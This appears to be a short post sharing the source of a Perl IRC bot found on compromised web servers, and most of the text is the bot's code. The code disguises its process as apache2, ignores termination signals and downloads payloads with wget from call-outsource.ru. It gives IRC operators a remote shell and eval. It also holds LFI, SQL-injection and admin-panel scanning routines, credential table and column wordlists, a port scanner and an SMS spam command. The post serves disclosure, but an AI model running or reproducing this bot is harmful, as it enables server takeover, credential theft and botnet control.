Something found in the wild, causing some problems in servers here and there. Bot is running impersonating apache2 process, "/usr/sbin/apache2 -k start", setting the user-agent with more than 60 different options and attacking a wide range of web applications.
Code is here,
1: #!/usr/bin/perl2: ################################################3: use HTTP::Request; #4: use HTTP::Request::Common; #5: use HTTP::Request::Common qw(POST); #6: use LWP::Simple; #7: use LWP 5.64; #8: use LWP::UserAgent; #9: use Socket; #10: use IO::Socket; #11: use IO::Socket::INET; #12: use IO::Select; #13: use MIME::Base64; #14: ################################################15:16: my $datetime = localtime;17:18: my $Rondoeproc = "/usr/sbin/apache2 -k start";19: my $ircserver = $ARGV[0] unless $ircserver;20: my $ircport = $ARGV[1];21: my $nickname = $ARGV[2];22: my $ident = $ARGV[3];23: my $channel = '#'.$ARGV[4];24: my $admin = $ARGV[5];25: my $fullname = "Suwong Community";26:27: my $nob0dy = "154@9nobody15)";28: my $lfilogo = "15(4@11LFI15)";29: my $rfilogo = "15(4@11RFI15)";30: my $e107logo = "15(4@11e10715)";31: my $xmllogo = "15(4@11XML15)";32: my $sqllogo = "15(4@11SQL15)";33: my $oscologo = "15(4@11oSCo15)";34: my $zenlogo = "15(4@11ZEN15)";35: my $oplogo = "15(4@11OPEN15)";36: my $admlogo = "15(4@11PHP15)";37: my $smslogo = "15(4@11SMS15)";38: my $ossqllogo = "15(4@11OSCO-SQL15)";39: my $e107logosql = "15(4@11E107-SQL15)";40:41: my $lficmd = '!lfi';42: my $rficmd = '!rfi';43: my $e107cmd = '!e107';44: my $xmlcmd = '!xml';45: my $sqlcmd = '!mysql';46: my $oscocmd = '!osco';47: my $zencmd = '!zen';48: my $admcmd = '!adm';49: my $opcmd = '!op';50: my $ossqlcmd = '!oscmd';51: my $esqlcmd = '!sqle';52: my $Cyblfi = '!lfi2';53:54: my $cmdlfi = '!cmdlfi';55: my $cmde107 = '!cmde107';56: my $cmdxml = '!cmdxml';57:58: my $injector = "http://call-outsource.ru/logs/crew.jpg";59: my $botshell = "http://call-outsource.ru/logs/daster.jpg";60: my $botshell2 = "http://call-outsource.ru/logs/topi.jpg";61: my $botshell3 = "http://call-outsource.ru/logs/j1.txt";62: my $botshell4 = "http://call-outsource.ru/logs/j2.txt";63: my $cocok = "http://call-outsource.ru/logs/cocok.txt";64: my @domen = ("site:.org","site:.net","site:.com","site:.au","site:.bg","site:.il","site:.ir","site:.br","site:.be","site:.biz","site:.ca","site:.cz","site:.de","site:.fr","site:.fi","site:.uk","site:.ru","site:.jp","site:.nl","site:.es","site:.sg","site:.tv","site:.my","site:.pt","site:.za","site:.co","site:.cc",65: "site:.it","site:.hu","site:.mx","site:.info","site:.pl","site:.vn","site:.us","site:.ua","site:.eu","site:.ch","site:.gr","site:.ro","site:.ar","site:.pd","site:.lt","site:.pr","site:.kr","Itemid,27","Itemid,37","Itemid,47","Itemid,57","Itemid,67","Itemid,87","Itemid,97","Itemid,107","Itemid,117");66:67: my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",68: "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",69: "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",70: "Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112");71: "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",72: "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",73: "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",74: "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",75: "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",76: "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",77: "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",78: "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",79: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",80: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",81: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",82: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",83: "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",84: "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",85: "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",86: "Microsoft Pocket Internet Explorer/0.6",87: "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",88: "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",89: "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",90: "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",91: "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",92: "Advanced Browser (http://www.avantbrowser.com)",93: "Avant Browser (http://www.avantbrowser.com)",94: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",95: "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",96: "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",97: "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",98: "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",99: "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",100: "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",101: "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",102: "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",103: "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",104: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",105: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",106: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",107: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",108: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",109: "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",110: "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",111: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",112: "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",113: "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",114: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",115: "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",116: "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",117: "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",118: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",119: "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",120: "Mozilla/3.0 (OS/2; U)",121: "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",122: "Mozilla/4.61 (Macintosh; I; PPC)",123: "Mozilla/4.61 [en] (OS/2; U)",124: "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",125: "Mozilla/4.8 [en] (Windows NT 5.0; U)","Alcatel-OH5/1.0 UP.Browser/6.1.0.7.7 (GUI) MMP/1.0",126: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Mobile/7D11",127: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16",128: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",129: "Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20",130: "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C106c",131: "Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7D11",132: "Mozilla/5.0 (Linux; U; Android 2.1-update1; en-gb; Desire_A8181 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",133: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) BlackBerry8707/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/150",134: "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)",135: "Gigabot/3.0 (http://www.gigablast.com/spider.html)",136: "gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)",137: "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12",138: "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)",139: "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4",140: "Infoseek SideWinder/2.0B (Linux 2.4 i686)",141: "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6",142: "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)",143: "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1",144: "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)",145: my $uagent = $uagents[rand(scalar(@uagents))];146: my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";147: my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";148: my $adm_output = ("uid=");149: my $open_output = ("FCKeditor - Connectors Tests");150:151: my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',152: 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',153: 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',154: 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',155: 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',156: 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',157: 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',158: 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',159: 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',160: 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');161: my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',162: 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',163: 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',164: 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',165: 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',166: 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');167: $SIG{'INT'} = 'IGNORE';168: $SIG{'HUP'} = 'IGNORE';169: $SIG{'TERM'} = 'IGNORE';170: $SIG{'CHLD'} = 'IGNORE';171: $SIG{'PS'} = 'IGNORE';172: chdir("/tmp");173: chop (my $priper = `wget http://call-outsource.ru/logs/crew.jpg -O crew.jpg;wget http://call-outsource.ru/logs/crew.jpg -O crew.jpg;wget http://call-outsource.ru/logs/daster.jpg -O daster.jpg;wget http://call-outsource.ru/logs/topi.jpg -O topi.jpg;wget http://call-outsource.ru/logs/j1.txt -O j1.txt;wget http://call-outsource.ru/logs/j2.txt -O j2.txt;wget http://call-outsource.ru/logs/cocok.txt -O cocok.txt`);174: $ircserver = "$ARGV[0]" if $ARGV[0];175: $0 = "$Rondoeproc"."\0" x 16;;176: my $pid = fork;177: exit if $pid;178: die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);179:180: our %irc_servers;181: our %DCC;182: my $dcc_sel = new IO::Select->new();183: $sel_client = IO::Select->new();184: sub sendraw {185: if ($#_ == '1') {186: my $socket = $_[0];187: print $socket "$_[1]\n";188: } else {189: print $IRC_cur_socket "$_[0]\n";190: }191: }192:193: sub connector {194: my $mynick = $_[0];195: my $ircserver_con = $_[1];196: my $ircport_con = $_[2];197: my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);198: if (defined($IRC_socket)) {199: $IRC_cur_socket = $IRC_socket;200: $IRC_socket->autoflush(1);201: $sel_client->add($IRC_socket);202: $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";203: $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";204: $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;205: $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;206: nick("$mynick");207: my $versi = "-";208: sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");209: sleep (1);}}210: sub parse {211: my $servarg = shift;212: if ($servarg =~ /^PING \:(.*)/) {213: sendraw("PONG :$1");214: }215: elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {216: if (lc($1) eq lc($mynick)) {217: $mynick = $4;218: $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;219: }220: }221: elsif ($servarg =~ m/^\:(.+?)\s+433/i) {222: nick("$mynick".int rand(1));223: }224: elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {225: $mynick = $2;226: $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;227: $irc_servers{$IRC_cur_socket}{'nome'} = "$1";228: sendraw("MODE $mynick +i");229: sendraw("JOIN $channel");230: sleep(2);231: sendraw("PRIVMSG $admin :Hi $admin im here !!!");232: }233: }234: my $line_temp;235: while( 1 ) {236: while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }237: select(undef, undef, undef, 0.01);;238: delete($irc_servers{''}) if (defined($irc_servers{''}));239: my @ready = $sel_client->can_read(0);240: next unless(@ready);241: foreach $fh (@ready) {242: $IRC_cur_socket = $fh;243: $mynick = $irc_servers{$IRC_cur_socket}{'nick'};244: $nread = sysread($fh, $ircmsg, 4096);245: if ($nread == 0) {246: $sel_client->remove($fh);247: $fh->close;248: delete($irc_servers{$fh});249: }250: @lines = split (/\n/, $ircmsg);251: $ircmsg =~ s/\r\n$//;252:253: if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {254: my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);255: my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,AmiDalLa,BusCaR,KvaSiR,eXciTe,InteRia,SnZ,RambLer,YaNdeX,AllTheWeb,IxQuic,LiBero,mSn,GooDsEaRch,MaMmA,FiRebalL,WeBcRawLer";256: if ($path eq $mynick) {257: if ($msg =~ /^PING (.*)/) {258: sendraw("NOTICE $nick :PING $1");259: }260: if ($msg =~ /^VERSION/) {261: sendraw("NOTICE $nick :VERSION mIRC v6.17 Rondo");262: }263: if ($msg =~ /^TIME/) {264: sendraw("NOTICE $nick :TIME ".$datetime."");265: }266: if (&isAdmin($nick) && $msg eq "!die") {267: &shell("$path","kill -9 $$");268: }269: if (&isAdmin($nick) && $msg eq "!killall") {270: &shell("$path","killall -9 perl");271: }272: if (&isAdmin($nick) && $msg eq "!reset") {273: sendraw("QUIT :Lompat...");274: }275: if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {276: sendraw("JOIN #".$1);277: }278: if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {279: sendraw("PART #".$1);280: }281: if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {282: sendraw("NICK ".$1);283: }284: if (&isAdmin($nick) && $msg =~ /^!pid/) {285: sendraw($IRC_cur_socket, "PRIVMSG $nick :9Rondoe Process/PID : $Rondoeproc - $$");286: }287: if (&isAdmin($nick) && $msg !~ /^!/) {288: &shell("$nick","$msg");289: }290: if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){291: my $url = $1.$lfdtest;292: my $cmd = $2;293: &cmdlfi($url,$cmd,$nick);294: }295: if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){296: my $url = $1;297: my $cmd = $2;298: &cmdxml($url,$cmd,$nick);299: }300: if (&isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){301: my $url = $1;302: my $cmd = $2;303: &cmde107($url,$cmd,$nick);304: }305: }306: else {307: if (&isAdmin($nick) && $msg eq "!die") {308: &shell("$path","kill -9 $$");309: }310: if (&isAdmin($nick) && $msg eq "!killall") {311: &shell("$path","killall -9 perl");312: }313: if (&isAdmin($nick) && $msg eq "!reset") {314: sendraw("QUIT :Lompat...");315: }316: if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {317: sendraw("JOIN #".$1);318: }319: if (&isAdmin($nick) && $msg eq "!part") {320: sendraw("PART $path");321: }322: if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {323: sendraw("PART #".$1);324: }325: if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {326: &shell("$path","$1");327: }328: if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {329: &shell("$path","$1");330: }331: if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {332: eval "$1";333: }334: ##################################################################### HIT335:336: if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){337: my $url = $1.$lfdtest;338: my $cmd = $2;339: &cmdlfi($url,$cmd,$path);340: }341: if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){342: my $url = $1;343: my $cmd = $2;344: &cmdxml($url,$cmd,$path);345: }346: if ($msg=~ /^$cmde107\s+(.+?)\s+(.*)/){347: my $url = $1;348: my $cmd = $2;349: &cmde107($url,$cmd,$path);350: }351:352: ##################################################################### SMS353: if ($msg=~ /^!sms\s+(.*?)\s+(.*)/){354: my $no = $1;355: my $pesan = $2;356: if(sendSMS($no,$pesan)){357: &msg("$path","$smslogo 9Sukses mengirim ke 4 ".$no."9 Pengirim : 4 ".$nick);358: }359: else {360: &msg("$path","$smslogo 4 GAGAL!!");361: }362: }363:364: ##################################################################### HELP COMMAND365:366: if ($msg=~ /^!help/) {367: my $helplogo = "3(4@13HelP3)";368: &msg("$path","$helplogo 11 ########################4[ Suwong Community ]11############################");369: &msg("$path","$helplogo 8 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|$ossqlcmd|$esqlcmd [bug][dork])");370: &msg("$path","$helplogo 13 ( $cmde107|$cmdlfi|$cmdxml) [target][cmd]|!sms[no][pesan] )");371: &msg("$path","$helplogo 6 ( $e107cmd | $zencmd | $oscocmd | $admcmd | $opcmd [dork] ) ");sleep(2);372: &msg("$path","$helplogo 3 ( !login [web]|!port [ip][port]|!base64 [data]|!ip [ip]|!dns [host] )");373: &msg("$path","$helplogo 5 ( !about|!engine|!version|!proxy [3digit]|!paypal [email] )");374: &msg("$path","$helplogo 11 ######################4[ END HELP ]11#########################");375: }376: if ($msg=~ /^!engine/) {377: my $enginelogo = "15(4@9EnginE15)";378: &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");379: &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");380: &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");381: }382: if ($msg=~ /^!about/) {383: my $aboutlogo = "15(4@9About15)";384: &msg("$path","$aboutlogo 12Suwong Community");385: &msg("$path","$aboutlogo 4CoDeD Jancok");386: &msg("$path","$aboutlogo 6MoD by Suwong Team");387: }388: if ($msg=~ /^!version/) {389: my $versionlogo = "15(4@9Version15)";390: &msg("$path","$versionlogo 12 priv8 SE v3.2");391: }392: if ($msg=~ /^!respon/ || $msg=~ /^!id/) {393: if (&isFound($injector,"R29hQ3JlVw==")) {394: &msg("$path","15(4@9Injector15)4 OFF!!!");395: } else {396: &msg("$path","15(4@9Injector15)8 OFF!!!");397: }398: }399: if (&isAdmin($nick) && $msg =~ /^!pid/) {400: ¬ice("$nick","9Rondoe Process/PID : 3$Rondoeproc - $$");401: }402: ##################################################################### TOOLS403: if ($msg=~ /^!proxy\s+(.+)/){404: if (my $pid = fork) { waitpid($pid, 0); } else {405: if (fork) { exit; } else {406: my $minta = $1;407: &msg("$path","15(4@9PROXY15)13 Checking Proxy..");408: &proxy($path,$minta);409: }410: exit;411: }412: }413:414: if ($msg=~ /^!dns\s+(.*)/){415: my $nsku = $1;416: $mydns = inet_ntoa(inet_aton($nsku));417: &msg("$path", "15(4@9DNS15) 13$nsku 9Resolve Ke 4 $mydns");418: }419:420: if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {421: my $hostip= "$1";422: my $portsc= "$2";423: my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);424: if ($scansock) {425: &msg("$path","15(4@9PORT15)7 $hostip : $portsc 12Yes Cruutz");426: }427: else {428: &msg("$path","15(4@9PORT15)7 $hostip : $portsc 4connection refused");429: }430: }431:432: if ($msg=~ /^!ip\s+(.*)/ ) {433: if (my $pid = fork) { waitpid($pid, 0); } else {434: if (fork) { exit; } else {435: my $ip = $1;436: &msg("$path","15(4@9IP15)6 Searching ".$ip." 9Location ...");437: my $website = "http://www.ipligence.com/geolocation";438: my ($useragent,$request,$response,%form);439: undef %form;440: $form{ip} = $ip;441: $useragent = LWP::UserAgent->new;442: $useragent->timeout(5);443: $request = POST $website,\%form;444: $response = $useragent->request($request);445: if ($response->is_success) {446: my $res = $response->content;447: if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {448: my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);449: &msg("$path","15(4@9IP15)13 IP Address : ".$ip." 9 ( ".$ipaddress." )");450: &msg("$path","15(4@9IP15)13 City : ".$ip." 9 ( ".$city." )");451: &msg("$path","15(4@9IP15)13 Country : ".$ip." 9 ( ".$country." )");452: &msg("$path","15(4@9IP15)13 Continent : ".$ip." 9 ( ".$continent." )");453: }454: else {455: &msg("$path","15(4@9IP15)13 ".$ip." 4not found in database");456: }457: }458: else {459: &msg("$path","15(4@9IP15)4 Cannot open IP database.");460: }461: }462: exit;463: }464: }465:466: if ($msg=~ /^!base64 (.*)$/ ) {467: if (my $pid = fork) { waitpid($pid, 0); } else {468: if (fork) { exit; } else {469: my $hash = $1;470: my $base64_encoded = encode_base64($hash);471: my $base64_decoded = decode_base64($hash);472: &msg("$path","15(4@9BASE6415)13 Decode : 9$base64_decoded");473: &msg("$path","15(4@9BASE6415)13 Encode : 9$base64_encoded");474: }475: exit;476: }477: }478:479: if ($msg =~ /^!portscan (.*)$/ ) {480: my $hostip="$1";481: my @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");482: my (@aberta, %porta_banner);483: &msg("$path","15(4@9PORTSCAN15) 13Loading port scanner.");484: foreach my $porta (@portas) {485: my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);486: if ($scansock) {487: push (@aberta, $porta);488: $scansock->close;489: }490: }491:492: if (@aberta) {493: &msg("$path", "15(4@9portscan15)13 open ports are...:5 @aberta");494: } else {495: &msg("$path","15(4@9portscan15)4 all ports are closed");496: }497: }498:499: if ($msg=~ /^!login (.*)$/ ) {500: if (my $pid = fork) { waitpid($pid, 0); } else {501: if (fork) { exit; } else {502: my $test = $1 ;503: @index = ('/admin/','/ADMIN/','/login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/log.php','/admin/controlpanel.html','/admin/controlpanel.php','/admin.php','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/','/administrator/index.php','/administrator/login.html','/administrator/login.php','/administrator/account.html','/administrator/account.php','/administrator.php','/administrator.html','/login.php','/login.html','/controlpanel/','/administration/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/','/wp-admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/members/','/wp-login/','/admin/','/ADMIN/','/login/','/adm/','/cms/','/administrator/','/admin/login.php','/ADMIN/login.php','/admin/log.php','/admin/controlpanel.html','/admin/controlpanel.php','/admin.php','/admin.html','/admin/cp.php','/admin/cp.html','/cp.php','/cp.html','/controlpanel/','/panelc/','/administrator/index.php','/administrator/login.html','/administrator/login.php','/administrator/account.html','/administrator/account.php','/administrator.php','/administrator.html','/login.php','/login.html','/controlpanel/','/administration/','/administration.php','/administration.html','/phpmyadmin/','/myadmin/','/wp-admin/','/webadmin/','/webadmin.php','/webadmin.html','/admins/','/admins.php','/admins.html','/WebAdmin/','/admin1/','/panel/','/cpanel/','/cPanel/','/members/','/wp-login/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/log.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',504: 